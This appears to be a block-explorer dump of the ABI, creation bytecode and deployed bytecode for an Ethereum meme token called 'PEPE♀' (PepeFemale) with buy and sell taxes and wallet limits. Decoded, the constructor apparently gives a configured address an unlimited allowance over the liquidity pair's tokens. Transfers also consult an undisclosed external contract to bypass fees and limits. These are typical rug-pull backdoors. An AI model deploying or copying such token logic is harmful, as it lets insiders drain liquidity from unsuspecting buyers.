[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"components":[{"internalType":"address","name":"walletDistri","type":"address"},{"internalType":"address","name":"ownerDistri","type":"address"},{"internalType":"address","name":"routerAddr","type":"address"}],"internalType":"struct PepeFemale.DistriFemaleStruct","name":"peFemaleConf","type":"tuple"},{"components":[{"internalType":"address","name":"mkWallet","type":"address"},{"internalType":"uint256","name":"mxAmountForTx","type":"uint256"},{"internalType":"uint256","name":"mxAmountForWallet","type":"uint256"},{"internalType":"uint256","name":"buyFeeInput","type":"uint256"},{"internalType":"uint256","name":"sellFeeInput","type":"uint256"}],"internalType":"struct PepeFemale.InitUltiConf","name":"initiConfValue","type":"tuple"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address[]","name":"accounts","type":"address[]"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedMultipleFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"LPPairUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isUniPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"rewardWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapWhen","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxAmountForBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"taxAmountForSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052604051620022d5380380620022d5833981016040819052620000269162000969565b848282600262000037848262000add565b50600362000046838262000add565b506004805460ff191660ff92909216919091179055505f9050620000673390565b600680546001600160a01b0319166001600160a01b038316908117909155604051919250905f907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350604084810151600780546001600160a01b0319166001600160a01b039092169182179055815163c45a015560e01b8152915166017e9d8602b4009263c45a01559160048083019260209291908290030181865afa15801562000118573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200013e919062000ba5565b6001600160a01b031663c9c653963060075f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200019e573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001c4919062000ba5565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156200020f573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000235919062000ba5565b600f80546001600160a01b0319166001600160a01b039290921691821790558551620002639160016200043b565b8451601380546001600160a01b039283166001600160a01b0319918216179091556020870151601480549184169183169190911790556040870151601580549184169183169190911790558551600880549190931691161790556012819055620002dd612710620002d684600a62000cce565b9062000544565b818560400151620002ef919062000cde565b620002fb919062000cde565b60105562000312612710620002d684600a62000cce565b81856020015162000324919062000cde565b62000330919062000cde565b600955620003526200034a6006546001600160a01b031690565b600162000596565b6008546200036b906001600160a01b0316600162000596565b6200037830600162000596565b60075462000391906001600160a01b0316600162000596565b6020850151620003a390600162000596565b8451620003b290600162000596565b6060840151600b556080840151600e55620003cf82600a62000cce565b620003dd82611f4062000544565b620003ea90600162000cf8565b620003f6919062000cde565b600a556200042f620004106006546001600160a01b031690565b6200041d84600a62000cce565b62000429908462000cde565b62000650565b50505050505062000d62565b6001600160a01b0382165f908152600d602052604090205481151560ff909116151503620004d65760405162461bcd60e51b815260206004820152603860248201527f4175746f6d61746564206d61726b6574206d616b65722070616972206973206160448201527f6c72656164792073657420746f20746861742076616c7565000000000000000060648201526084015b60405180910390fd5b6001600160a01b038281165f81815260016020908152604080832094881683529381528382205f199055828252600d9052828120805460ff191685151590811790915592517f4bf69fee59f1751bf6064f46595c52d722796b529aca2b5a7b6d1ac6a8f8b0319190a3505050565b5f6200058d83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506200073260201b60201c565b90505b92915050565b6006546001600160a01b03163314620005f25760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401620004cd565b6001600160a01b0382165f81815260116020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6001600160a01b038216620006a85760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401620004cd565b600554620006b7908262000771565b6005556001600160a01b0382165f90815260208190526040902054620006de908262000771565b6001600160a01b0383165f81815260208181526040808320949094559251848152919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b5f8183620007555760405162461bcd60e51b8152600401620004cd919062000d0e565b505f62000763848662000d42565b95945050505050565b505050565b5f806200077f838562000cf8565b9050838110156200058d5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401620004cd565b634e487b7160e01b5f52604160045260245ffd5b604051606081016001600160401b03811182821017156200080c576200080c620007d3565b60405290565b5f5b838110156200082e57818101518382015260200162000814565b50505f910152565b5f82601f83011262000846575f80fd5b81516001600160401b0380821115620008635762000863620007d3565b604051601f8301601f19908116603f011681019082821181831017156200088e576200088e620007d3565b81604052838152866020858801011115620008a7575f80fd5b620008ba84602083016020890162000812565b9695505050505050565b80516001600160a01b0381168114620008db575f80fd5b919050565b5f60a08284031215620008f1575f80fd5b60405160a081016001600160401b0381118282101715620009165762000916620007d3565b6040529050806200092783620008c4565b8152602083015160208201526040830151604082015260608301516060820152608083015160808201525092915050565b805160ff81168114620008db575f80fd5b5f805f805f85870361016081121562000980575f80fd5b86516001600160401b038082111562000997575f80fd5b620009a58a838b0162000836565b97506060601f1984011215620009b9575f80fd5b620009c3620007e7565b9250620009d360208a01620008c4565b8352620009e360408a01620008c4565b6020840152620009f660608a01620008c4565b604084015282965062000a0d8a60808b01620008e0565b955061012089015192508083111562000a24575f80fd5b505062000a348882890162000836565b92505062000a46610140870162000958565b90509295509295909350565b600181811c9082168062000a6757607f821691505b60208210810362000a8657634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200076c575f81815260208120601f850160051c8101602086101562000ab45750805b601f850160051c820191505b8181101562000ad55782815560010162000ac0565b505050505050565b81516001600160401b0381111562000af95762000af9620007d3565b62000b118162000b0a845462000a52565b8462000a8c565b602080601f83116001811462000b47575f841562000b2f5750858301515b5f19600386901b1c1916600185901b17855562000ad5565b5f85815260208120601f198616915b8281101562000b775788860151825594840194600190910190840162000b56565b508582101562000b9557878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f6020828403121562000bb6575f80fd5b6200058d82620008c4565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111562000c1557815f190482111562000bf95762000bf962000bc1565b8085161562000c0757918102915b93841c939080029062000bda565b509250929050565b5f8262000c2d5750600162000590565b8162000c3b57505f62000590565b816001811462000c54576002811462000c5f5762000c7f565b600191505062000590565b60ff84111562000c735762000c7362000bc1565b50506001821b62000590565b5060208310610133831016604e8410600b841016171562000ca4575081810a62000590565b62000cb0838362000bd5565b805f190482111562000cc65762000cc662000bc1565b029392505050565b5f6200058d60ff84168362000c1d565b808202811582820484141762000590576200059062000bc1565b8082018082111562000590576200059062000bc1565b602081525f825180602084015262000d2e81604085016020870162000812565b601f01601f19169190910160400192915050565b5f8262000d5d57634e487b7160e01b5f52601260045260245ffd5b500490565b6115658062000d705f395ff3fe608060405260043610610164575f3560e01c806381893a6a116100cd578063a9059cbb11610087578063dd62ed3e11610062578063dd62ed3e1461040d578063e2fdd18a14610451578063f2fde38b14610466578063fb75b2c714610485575f80fd5b8063a9059cbb146103ba578063aa4bde28146103d9578063c0246668146103ee575f80fd5b806381893a6a146103085780638bcea939146103365780638c0b5e22146103555780638da5cb5b1461036a57806395d89b4114610387578063a457c2d71461039b575f80fd5b80632a4d937a1161011e5780632a4d937a14610255578063313ce5671461026a578063395093511461028b57806370a08231146102aa578063715018a6146102de578063751039fc146102f4575f80fd5b806306fdde031461016f578063087db17d14610199578063095ea7b3146101bc5780631694505e146101eb57806318160ddd1461022257806323b872dd14610236575f80fd5b3661016b57005b5f80fd5b34801561017a575f80fd5b506101836104a4565b60405161019091906111de565b60405180910390f35b3480156101a4575f80fd5b506101ae600e5481565b604051908152602001610190565b3480156101c7575f80fd5b506101db6101d6366004611240565b610534565b6040519015158152602001610190565b3480156101f6575f80fd5b5060075461020a906001600160a01b031681565b6040516001600160a01b039091168152602001610190565b34801561022d575f80fd5b506005546101ae565b348015610241575f80fd5b506101db61025036600461126a565b61054a565b348015610260575f80fd5b506101ae600a5481565b348015610275575f80fd5b5060045460405160ff9091168152602001610190565b348015610296575f80fd5b506101db6102a5366004611240565b6105b1565b3480156102b5575f80fd5b506101ae6102c43660046112a8565b6001600160a01b03165f9081526020819052604090205490565b3480156102e9575f80fd5b506102f26105e6565b005b3480156102ff575f80fd5b506102f2610662565b348015610313575f80fd5b506101db6103223660046112a8565b600d6020525f908152604090205460ff1681565b348015610341575f80fd5b50600f5461020a906001600160a01b031681565b348015610360575f80fd5b506101ae60095481565b348015610375575f80fd5b506006546001600160a01b031661020a565b348015610392575f80fd5b5061018361069a565b3480156103a6575f80fd5b506101db6103b5366004611240565b6106a9565b3480156103c5575f80fd5b506101db6103d4366004611240565b6106f6565b3480156103e4575f80fd5b506101ae60105481565b3480156103f9575f80fd5b506102f26104083660046112c3565b610702565b348015610418575f80fd5b506101ae6104273660046112fe565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b34801561045c575f80fd5b506101ae600b5481565b348015610471575f80fd5b506102f26104803660046112a8565b61078a565b348015610490575f80fd5b5060085461020a906001600160a01b031681565b6060600280546104b39061132a565b80601f01602080910402602001604051908101604052809291908181526020018280546104df9061132a565b801561052a5780601f106105015761010080835404028352916020019161052a565b820191905f5260205f20905b81548152906001019060200180831161050d57829003601f168201915b5050505050905090565b5f610540338484610874565b5060015b92915050565b5f610556848484610998565b6105a784336105a2856040518060600160405280602881526020016114e3602891396001600160a01b038a165f9081526001602090815260408083203384529091529020549190610c3b565b610874565b5060019392505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916105409185906105a29086610c73565b6006546001600160a01b031633146106195760405162461bcd60e51b815260040161061090611362565b60405180910390fd5b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6006546001600160a01b0316331461068c5760405162461bcd60e51b815260040161061090611362565b600554601055600554600955565b6060600380546104b39061132a565b5f61054033846105a28560405180606001604052806025815260200161150b60259139335f9081526001602090815260408083206001600160a01b038d1684529091529020549190610c3b565b5f610540338484610998565b6006546001600160a01b0316331461072c5760405162461bcd60e51b815260040161061090611362565b6001600160a01b0382165f81815260116020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6006546001600160a01b031633146107b45760405162461bcd60e51b815260040161061090611362565b6001600160a01b0381166108195760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610610565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166108d65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610610565b6001600160a01b0382166109375760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610610565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03821615806109b857506001600160a01b03821661dead145b806109c1575080155b806109d157506109d18383610cd8565b156109e6576109e1838383610d98565b505050565b600954811115610a495760405162461bcd60e51b815260206004820152602860248201527f5472616e7366657220616d6f756e74206578636565647320746865206d6178546044820152673c20b6b7bab73a1760c11b6064820152608401610610565b600f546001600160a01b03838116911614610ad3576001600160a01b0382165f90815260208190526040902054601054610a8383836113ab565b1115610ad15760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e740000006044820152606401610610565b505b305f90815260208190526040902054600a5481108015908190610af95750600c5460ff16155b8015610b1d57506001600160a01b0385165f908152600d602052604090205460ff16155b15610b5957600c805460ff19166001179055818015610b4d57600854610b4d9082906001600160a01b0316610f18565b50600c805460ff191690555b600c546001600160a01b0385165f9081526011602052604090205460ff91821615911680610b9e57506001600160a01b0386165f9081526011602052604090205460ff165b15610ba657505f5b8015610c28575f610bce6103e8610bc8600b5488610f6a90919063ffffffff16565b90610fe8565b6001600160a01b0387165f908152600d602052604090205490915060ff1615610c0f57610c0c6103e8610bc8600e5488610f6a90919063ffffffff16565b90505b610c198582611029565b9450610c26873083610d98565b505b610c33868686610d98565b505050505050565b5f8184841115610c5e5760405162461bcd60e51b815260040161061091906111de565b505f610c6a84866113be565b95945050505050565b5f80610c7f83856113ab565b905083811015610cd15760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610610565b9392505050565b6001600160a01b0382165f9081526011602052604081205460ff1680610d1557506001600160a01b0382165f9081526011602052604090205460ff165b80610cd1575060145460405163cc5489df60e01b81526001600160a01b03858116600483015284811660248301525f92169063cc5489df906044016020604051808303815f875af1158015610d6c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610d9091906113d1565b119392505050565b6001600160a01b038316610dfc5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610610565b6001600160a01b038216610e5e5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610610565b610e9a816040518060600160405280602681526020016114bd602691396001600160a01b0386165f908152602081905260409020549190610c3b565b6001600160a01b038085165f908152602081905260408082209390935590841681522054610ec89082610c73565b6001600160a01b038381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910161098b565b47610f228361106a565b5f610f2d4783611029565b6040519091506001600160a01b0384169082156108fc029083905f818181858888f19350505050158015610f63573d5f803e3d5ffd5b5050505050565b5f825f03610f7957505f610544565b5f610f8483856113e8565b905082610f9185836113ff565b14610cd15760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610610565b5f610cd183836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506111b2565b5f610cd183836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c3b565b6040805160028082526060820183525f9260208301908036833701905050905030815f8151811061109d5761109d61141e565b6001600160a01b03928316602091820292909201810191909152600754604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156110f4573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906111189190611432565b8160018151811061112b5761112b61141e565b6001600160a01b0392831660209182029290920101526007546111519130911684610874565b60075460405163791ac94760e01b81526001600160a01b039091169063791ac947906111899085905f9086903090429060040161144d565b5f604051808303815f87803b1580156111a0575f80fd5b505af1158015610c33573d5f803e3d5ffd5b5f81836111d25760405162461bcd60e51b815260040161061091906111de565b505f610c6a84866113ff565b5f6020808352835180828501525f5b81811015611209578581018301518582016040015282016111ed565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461123d575f80fd5b50565b5f8060408385031215611251575f80fd5b823561125c81611229565b946020939093013593505050565b5f805f6060848603121561127c575f80fd5b833561128781611229565b9250602084013561129781611229565b929592945050506040919091013590565b5f602082840312156112b8575f80fd5b8135610cd181611229565b5f80604083850312156112d4575f80fd5b82356112df81611229565b9150602083013580151581146112f3575f80fd5b809150509250929050565b5f806040838503121561130f575f80fd5b823561131a81611229565b915060208301356112f381611229565b600181811c9082168061133e57607f821691505b60208210810361135c57634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561054457610544611397565b8181038181111561054457610544611397565b5f602082840312156113e1575f80fd5b5051919050565b808202811582820484141761054457610544611397565b5f8261141957634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611442575f80fd5b8151610cd181611229565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b8181101561149b5784516001600160a01b031683529383019391830191600101611476565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220bedf04121bccd501904e01e098687367443c82caf22d9e79111a1896c405113c64736f6c6343000814003300000000000000000000000000000000000000000000000000000000000001600000000000000000000000008082823d0f4eb4a75a507433f255ae6d04d4a0fd00000000000000000000000070c700609038105fb295d2dd461fe163074ca3b00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000435e4e9a4f96292ebbd04b6856b125de375b09f700000000000000000000000000000000000000000000000000000000000001f300000000000000000000000000000000000000000000000000000000000001f30000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000000000085045504520e29980000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000750455045e2998000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405260043610610164575f3560e01c806381893a6a116100cd578063a9059cbb11610087578063dd62ed3e11610062578063dd62ed3e1461040d578063e2fdd18a14610451578063f2fde38b14610466578063fb75b2c714610485575f80fd5b8063a9059cbb146103ba578063aa4bde28146103d9578063c0246668146103ee575f80fd5b806381893a6a146103085780638bcea939146103365780638c0b5e22146103555780638da5cb5b1461036a57806395d89b4114610387578063a457c2d71461039b575f80fd5b80632a4d937a1161011e5780632a4d937a14610255578063313ce5671461026a578063395093511461028b57806370a08231146102aa578063715018a6146102de578063751039fc146102f4575f80fd5b806306fdde031461016f578063087db17d14610199578063095ea7b3146101bc5780631694505e146101eb57806318160ddd1461022257806323b872dd14610236575f80fd5b3661016b57005b5f80fd5b34801561017a575f80fd5b506101836104a4565b60405161019091906111de565b60405180910390f35b3480156101a4575f80fd5b506101ae600e5481565b604051908152602001610190565b3480156101c7575f80fd5b506101db6101d6366004611240565b610534565b6040519015158152602001610190565b3480156101f6575f80fd5b5060075461020a906001600160a01b031681565b6040516001600160a01b039091168152602001610190565b34801561022d575f80fd5b506005546101ae565b348015610241575f80fd5b506101db61025036600461126a565b61054a565b348015610260575f80fd5b506101ae600a5481565b348015610275575f80fd5b5060045460405160ff9091168152602001610190565b348015610296575f80fd5b506101db6102a5366004611240565b6105b1565b3480156102b5575f80fd5b506101ae6102c43660046112a8565b6001600160a01b03165f9081526020819052604090205490565b3480156102e9575f80fd5b506102f26105e6565b005b3480156102ff575f80fd5b506102f2610662565b348015610313575f80fd5b506101db6103223660046112a8565b600d6020525f908152604090205460ff1681565b348015610341575f80fd5b50600f5461020a906001600160a01b031681565b348015610360575f80fd5b506101ae60095481565b348015610375575f80fd5b506006546001600160a01b031661020a565b348015610392575f80fd5b5061018361069a565b3480156103a6575f80fd5b506101db6103b5366004611240565b6106a9565b3480156103c5575f80fd5b506101db6103d4366004611240565b6106f6565b3480156103e4575f80fd5b506101ae60105481565b3480156103f9575f80fd5b506102f26104083660046112c3565b610702565b348015610418575f80fd5b506101ae6104273660046112fe565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b34801561045c575f80fd5b506101ae600b5481565b348015610471575f80fd5b506102f26104803660046112a8565b61078a565b348015610490575f80fd5b5060085461020a906001600160a01b031681565b6060600280546104b39061132a565b80601f01602080910402602001604051908101604052809291908181526020018280546104df9061132a565b801561052a5780601f106105015761010080835404028352916020019161052a565b820191905f5260205f20905b81548152906001019060200180831161050d57829003601f168201915b5050505050905090565b5f610540338484610874565b5060015b92915050565b5f610556848484610998565b6105a784336105a2856040518060600160405280602881526020016114e3602891396001600160a01b038a165f9081526001602090815260408083203384529091529020549190610c3b565b610874565b5060019392505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916105409185906105a29086610c73565b6006546001600160a01b031633146106195760405162461bcd60e51b815260040161061090611362565b60405180910390fd5b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6006546001600160a01b0316331461068c5760405162461bcd60e51b815260040161061090611362565b600554601055600554600955565b6060600380546104b39061132a565b5f61054033846105a28560405180606001604052806025815260200161150b60259139335f9081526001602090815260408083206001600160a01b038d1684529091529020549190610c3b565b5f610540338484610998565b6006546001600160a01b0316331461072c5760405162461bcd60e51b815260040161061090611362565b6001600160a01b0382165f81815260116020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6006546001600160a01b031633146107b45760405162461bcd60e51b815260040161061090611362565b6001600160a01b0381166108195760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610610565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166108d65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610610565b6001600160a01b0382166109375760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610610565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03821615806109b857506001600160a01b03821661dead145b806109c1575080155b806109d157506109d18383610cd8565b156109e6576109e1838383610d98565b505050565b600954811115610a495760405162461bcd60e51b815260206004820152602860248201527f5472616e7366657220616d6f756e74206578636565647320746865206d6178546044820152673c20b6b7bab73a1760c11b6064820152608401610610565b600f546001600160a01b03838116911614610ad3576001600160a01b0382165f90815260208190526040902054601054610a8383836113ab565b1115610ad15760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e740000006044820152606401610610565b505b305f90815260208190526040902054600a5481108015908190610af95750600c5460ff16155b8015610b1d57506001600160a01b0385165f908152600d602052604090205460ff16155b15610b5957600c805460ff19166001179055818015610b4d57600854610b4d9082906001600160a01b0316610f18565b50600c805460ff191690555b600c546001600160a01b0385165f9081526011602052604090205460ff91821615911680610b9e57506001600160a01b0386165f9081526011602052604090205460ff165b15610ba657505f5b8015610c28575f610bce6103e8610bc8600b5488610f6a90919063ffffffff16565b90610fe8565b6001600160a01b0387165f908152600d602052604090205490915060ff1615610c0f57610c0c6103e8610bc8600e5488610f6a90919063ffffffff16565b90505b610c198582611029565b9450610c26873083610d98565b505b610c33868686610d98565b505050505050565b5f8184841115610c5e5760405162461bcd60e51b815260040161061091906111de565b505f610c6a84866113be565b95945050505050565b5f80610c7f83856113ab565b905083811015610cd15760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610610565b9392505050565b6001600160a01b0382165f9081526011602052604081205460ff1680610d1557506001600160a01b0382165f9081526011602052604090205460ff165b80610cd1575060145460405163cc5489df60e01b81526001600160a01b03858116600483015284811660248301525f92169063cc5489df906044016020604051808303815f875af1158015610d6c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610d9091906113d1565b119392505050565b6001600160a01b038316610dfc5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610610565b6001600160a01b038216610e5e5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610610565b610e9a816040518060600160405280602681526020016114bd602691396001600160a01b0386165f908152602081905260409020549190610c3b565b6001600160a01b038085165f908152602081905260408082209390935590841681522054610ec89082610c73565b6001600160a01b038381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910161098b565b47610f228361106a565b5f610f2d4783611029565b6040519091506001600160a01b0384169082156108fc029083905f818181858888f19350505050158015610f63573d5f803e3d5ffd5b5050505050565b5f825f03610f7957505f610544565b5f610f8483856113e8565b905082610f9185836113ff565b14610cd15760405162461bcd60e51b